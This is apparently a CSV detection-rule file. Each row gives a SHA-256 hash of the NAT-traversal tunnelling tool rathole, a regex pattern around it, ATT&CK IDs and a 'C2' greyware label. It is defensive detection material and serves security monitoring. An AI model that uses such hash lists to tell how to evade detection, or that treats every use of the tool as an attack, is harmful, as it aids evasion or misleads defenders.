"*73793e0d320ba7c4a8a4c5b7fe75283ca880530e18c76f3fc02180603301a34b*",".{0,1000}73793e0d320ba7c4a8a4c5b7fe75283ca880530e18c76f3fc02180603301a34b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*768789bf3298d6ebcd03995ad1a0af4de83af5d894030c67e70edc229f61bd75*",".{0,1000}768789bf3298d6ebcd03995ad1a0af4de83af5d894030c67e70edc229f61bd75.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*77bbb9dfeb00b721fdd4e6bf429487460843ca308673fb344c8ccbdb2e7ee7b6*",".{0,1000}77bbb9dfeb00b721fdd4e6bf429487460843ca308673fb344c8ccbdb2e7ee7b6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*7836f34128ee338249e00a47199408d57a052bd5f3e542ee9f09b6e42ad0895f*",".{0,1000}7836f34128ee338249e00a47199408d57a052bd5f3e542ee9f09b6e42ad0895f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*7e479c191b5a4dc29c0da009c7165ed6cba9171338a6360ce9e8e83167dcba99*",".{0,1000}7e479c191b5a4dc29c0da009c7165ed6cba9171338a6360ce9e8e83167dcba99.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*7f476454dbd7fb672b1d63e0786e2e2755a1fbfc3be04ab4f5bec8f23132a631*",".{0,1000}7f476454dbd7fb672b1d63e0786e2e2755a1fbfc3be04ab4f5bec8f23132a631.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*7fd3bda1079e0e7ca9186f8e2ac6a41c688b5ad0293b9afbe1f4397aa8f26e53*",".{0,1000}7fd3bda1079e0e7ca9186f8e2ac6a41c688b5ad0293b9afbe1f4397aa8f26e53.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*7ff5da235f8932a5e66bcf40bdf79947ebe731f8802af62a10684fed4e4e0388*",".{0,1000}7ff5da235f8932a5e66bcf40bdf79947ebe731f8802af62a10684fed4e4e0388.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*822374f306a334c37c055f40f4adcc6ef5b381a0e38133760634bdcd480186aa*",".{0,1000}822374f306a334c37c055f40f4adcc6ef5b381a0e38133760634bdcd480186aa.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*831296851f3b9f90c613b245ea3957e926f44f8373121a29b3f63df905b614c4*",".{0,1000}831296851f3b9f90c613b245ea3957e926f44f8373121a29b3f63df905b614c4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*84002e45f5979c6ca1478be38d0215007f8208edb2b4a45e2571f6c003828dbc*",".{0,1000}84002e45f5979c6ca1478be38d0215007f8208edb2b4a45e2571f6c003828dbc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*846318dda27ff847acc25676c4d7a133ee8ea2cb80d4f5d273ef0945f211dd57*",".{0,1000}846318dda27ff847acc25676c4d7a133ee8ea2cb80d4f5d273ef0945f211dd57.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*84c868b63bcfba344a52d0f53c63beaaf5dfc08f0ead2cee80656b48fa1d5e47*",".{0,1000}84c868b63bcfba344a52d0f53c63beaaf5dfc08f0ead2cee80656b48fa1d5e47.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*85549f76ecf192f4e61cdcbedc8af83b48a76d78924ab9c09eaeb31141944770*",".{0,1000}85549f76ecf192f4e61cdcbedc8af83b48a76d78924ab9c09eaeb31141944770.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*85bf085697ae96895b2ddf719c382e1647b4f17f4f4dc216dd89da79783dcd87*",".{0,1000}85bf085697ae96895b2ddf719c382e1647b4f17f4f4dc216dd89da79783dcd87.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*894368f2b42eac9feee89560aa890c1215883b716232c66f20bf4145d6bbf671*",".{0,1000}894368f2b42eac9feee89560aa890c1215883b716232c66f20bf4145d6bbf671.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*8a1ad5d4fc59693ea546bc7d9dfb9881cf33e48070907a5d7ca1b3643fb42590*",".{0,1000}8a1ad5d4fc59693ea546bc7d9dfb9881cf33e48070907a5d7ca1b3643fb42590.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*8b4cda04c1c75474ce2c59d9acbc32f83deaa0a0b6ce16aff15948ebddfec63e*",".{0,1000}8b4cda04c1c75474ce2c59d9acbc32f83deaa0a0b6ce16aff15948ebddfec63e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*8d2d38ec00ce9c7b59d7fb058a05709c6ecf7628cf9fcfc560c475691badc533*",".{0,1000}8d2d38ec00ce9c7b59d7fb058a05709c6ecf7628cf9fcfc560c475691badc533.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*8d800107c780c3f726b3768f5db0daa1a6d3d7ae0a505a8ea93fe554a4749294*",".{0,1000}8d800107c780c3f726b3768f5db0daa1a6d3d7ae0a505a8ea93fe554a4749294.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*8f722963b5b107b2856cb4169ed16aaf5b823df9795bf4dd11b97d644fa39347*",".{0,1000}8f722963b5b107b2856cb4169ed16aaf5b823df9795bf4dd11b97d644fa39347.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*8fc95d849e66592d8a52f98f28c2d7443b8b2057fc6bafe2a5fca05251507300*",".{0,1000}8fc95d849e66592d8a52f98f28c2d7443b8b2057fc6bafe2a5fca05251507300.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*90f66748d7cafe4e995a0ebcb7e7e10b84454618f02cc9dfdcb0bdfa01000642*",".{0,1000}90f66748d7cafe4e995a0ebcb7e7e10b84454618f02cc9dfdcb0bdfa01000642.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*921cf5b205e08c55b7d72439f0f27c4436cad9624493adedaec15a0283608d37*",".{0,1000}921cf5b205e08c55b7d72439f0f27c4436cad9624493adedaec15a0283608d37.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*921e9e63dabdae842d71d8f7e856d50e0bb25fa9e4e8aa40ac248b88fb4cb808*",".{0,1000}921e9e63dabdae842d71d8f7e856d50e0bb25fa9e4e8aa40ac248b88fb4cb808.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*92cc3feb57149c0b4dba7ec198dbda26c4831cde0a7c74a7d9f51e0002f65ead*",".{0,1000}92cc3feb57149c0b4dba7ec198dbda26c4831cde0a7c74a7d9f51e0002f65ead.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*933c42cc2516eb49b1af6e7a601b79e3e993c192ed3c50b7a96d22398197dc96*",".{0,1000}933c42cc2516eb49b1af6e7a601b79e3e993c192ed3c50b7a96d22398197dc96.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*95663244ae0b98220f0e0075980c0da70094a06638fb4498515857e92e3f8b56*",".{0,1000}95663244ae0b98220f0e0075980c0da70094a06638fb4498515857e92e3f8b56.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*95f005945eac00f3412ffc59d7c6bdfce751fcaac307f4b599ae917e98841766*",".{0,1000}95f005945eac00f3412ffc59d7c6bdfce751fcaac307f4b599ae917e98841766.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*9a49111f3b3fcd8f1f7c1ecfe79c3d10dc6ba4e7595e0bc776fb328f70f68705*",".{0,1000}9a49111f3b3fcd8f1f7c1ecfe79c3d10dc6ba4e7595e0bc776fb328f70f68705.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*9c3286d0cb644bc2ffdff9dacb89b6d1b87dabbde373a52e45b73717fcc97664*",".{0,1000}9c3286d0cb644bc2ffdff9dacb89b6d1b87dabbde373a52e45b73717fcc97664.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*9d6d883e78e055575e91b222042d50bb7a9d9e4f046257bc7c38e7f57deb552e*",".{0,1000}9d6d883e78e055575e91b222042d50bb7a9d9e4f046257bc7c38e7f57deb552e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*9f1df2f4b8d5719321755917aa858e159ead67978a568196bde136759e9dcb2b*",".{0,1000}9f1df2f4b8d5719321755917aa858e159ead67978a568196bde136759e9dcb2b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a0038697d35fbe64f1d9edc3493da99bdd0f27f7a79502134605c3064b2c704e*",".{0,1000}a0038697d35fbe64f1d9edc3493da99bdd0f27f7a79502134605c3064b2c704e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a131448308aacfd65d51f1a3861ccee0fd68640ed2694421871d46cd1216367b*",".{0,1000}a131448308aacfd65d51f1a3861ccee0fd68640ed2694421871d46cd1216367b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a2a82a2374bd7e6ade1645b0460c385b124bc7cce906c736f0b067ab21f0edaf*",".{0,1000}a2a82a2374bd7e6ade1645b0460c385b124bc7cce906c736f0b067ab21f0edaf.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a355fed40b126e5a6fe1963d63bb12397f6fd5a88f0e67a4325dafa925229e56*",".{0,1000}a355fed40b126e5a6fe1963d63bb12397f6fd5a88f0e67a4325dafa925229e56.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a3ac47f75e01e2efedea26ee4cf9ef3b4f45d12c45dd429438e03224c055832c*",".{0,1000}a3ac47f75e01e2efedea26ee4cf9ef3b4f45d12c45dd429438e03224c055832c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a4b0f3f35a5fb57515736985a37f348b9a3303515d5c381ecf95f3422f124da5*",".{0,1000}a4b0f3f35a5fb57515736985a37f348b9a3303515d5c381ecf95f3422f124da5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a581c3c813327c36e97ca933d0169224d82a428b596b1d64492b06108ac4b97d*",".{0,1000}a581c3c813327c36e97ca933d0169224d82a428b596b1d64492b06108ac4b97d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a6d0d66175c5968762fcb0cb5b967cb7add0ca4b11fa276899cf8de9a1c20c7f*",".{0,1000}a6d0d66175c5968762fcb0cb5b967cb7add0ca4b11fa276899cf8de9a1c20c7f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a6d80ede0043ee980ff8f7f70acabb0e318c18d4514f90a131250232b33f2933*",".{0,1000}a6d80ede0043ee980ff8f7f70acabb0e318c18d4514f90a131250232b33f2933.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a73d83dd80d910135838437fc31497f5a865c8021c38cebe29805c237115a995*",".{0,1000}a73d83dd80d910135838437fc31497f5a865c8021c38cebe29805c237115a995.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a7c2394f127db053d7da7e57353e017b319406f6474ff0318a8545c85cf55d80*",".{0,1000}a7c2394f127db053d7da7e57353e017b319406f6474ff0318a8545c85cf55d80.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*a8392f36da158c474403c3fee97076c704714db05735b0c23bec268d591e27b2*",".{0,1000}a8392f36da158c474403c3fee97076c704714db05735b0c23bec268d591e27b2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*aafc9e58277f79e98ea146c55da484c7524d7e56b13cb189102e8438f510edbb*",".{0,1000}aafc9e58277f79e98ea146c55da484c7524d7e56b13cb189102e8438f510edbb.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ace8104c5e20d3ff08efbb7ccc7a17421fa620ad0130a2f96642d38bcbf2de45*",".{0,1000}ace8104c5e20d3ff08efbb7ccc7a17421fa620ad0130a2f96642d38bcbf2de45.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ad1cdabfb431402a99e40c0a9d932fe2153d8a26dc3be0e3a0a3a6736989b2d4*",".{0,1000}ad1cdabfb431402a99e40c0a9d932fe2153d8a26dc3be0e3a0a3a6736989b2d4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ad62f18dcc34d56d48931cf7559bcb64e46e71feaf7e62ba8608ed38fc115937*",".{0,1000}ad62f18dcc34d56d48931cf7559bcb64e46e71feaf7e62ba8608ed38fc115937.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*ae33a0a1e4918c394acfd08d99853492fc97b9abafb4257fa739b6876a807950*",".{0,1000}ae33a0a1e4918c394acfd08d99853492fc97b9abafb4257fa739b6876a807950.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*aec887efef96f1f2ef41197b37806768476df4319c5f9a9cccac582e44f9893d*",".{0,1000}aec887efef96f1f2ef41197b37806768476df4319c5f9a9cccac582e44f9893d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*aedb3bc27109fe131c2e5fcd778b9f30b864ac438f9252266492ba83ae0b73f8*",".{0,1000}aedb3bc27109fe131c2e5fcd778b9f30b864ac438f9252266492ba83ae0b73f8.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b084b50bb95806e54bd010fa7e2663adfae267d4baea1b590b8f97a66ae730f9*",".{0,1000}b084b50bb95806e54bd010fa7e2663adfae267d4baea1b590b8f97a66ae730f9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b14b44b9a2346327ab1debd3d56028c3f861821666cbddb6c084e72ded0cb662*",".{0,1000}b14b44b9a2346327ab1debd3d56028c3f861821666cbddb6c084e72ded0cb662.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b4ae7e04d503aacbe2bcaf751c159d258fb4f199ccb3b5c2e0587531af6d3c4f*",".{0,1000}b4ae7e04d503aacbe2bcaf751c159d258fb4f199ccb3b5c2e0587531af6d3c4f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b5bed9e86f1fcce890d35bf0f75dcdabe99dece7a1b5af2f1cafb1af5104ec66*",".{0,1000}b5bed9e86f1fcce890d35bf0f75dcdabe99dece7a1b5af2f1cafb1af5104ec66.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b60aca868ccb04dd0116edeae8430c93be5dda4410f766d137d22dc02f9dce6e*",".{0,1000}b60aca868ccb04dd0116edeae8430c93be5dda4410f766d137d22dc02f9dce6e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b6bb35e5bb724ced8d8d7da596f060ec650909eba12e38b5c40bcf32ed5e0ac2*",".{0,1000}b6bb35e5bb724ced8d8d7da596f060ec650909eba12e38b5c40bcf32ed5e0ac2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*b76e232b8d3bb64d981b3a90fc81d1cf4e737fe28dfcfb41e37054a48ed326c2*",".{0,1000}b76e232b8d3bb64d981b3a90fc81d1cf4e737fe28dfcfb41e37054a48ed326c2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
"*bb57a815d8a4aae884fe930b7a0daa6c408b60d932286fd060a4cf61ee79e01a*",".{0,1000}bb57a815d8a4aae884fe930b7a0daa6c408b60d932286fd060a4cf61ee79e01a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z"
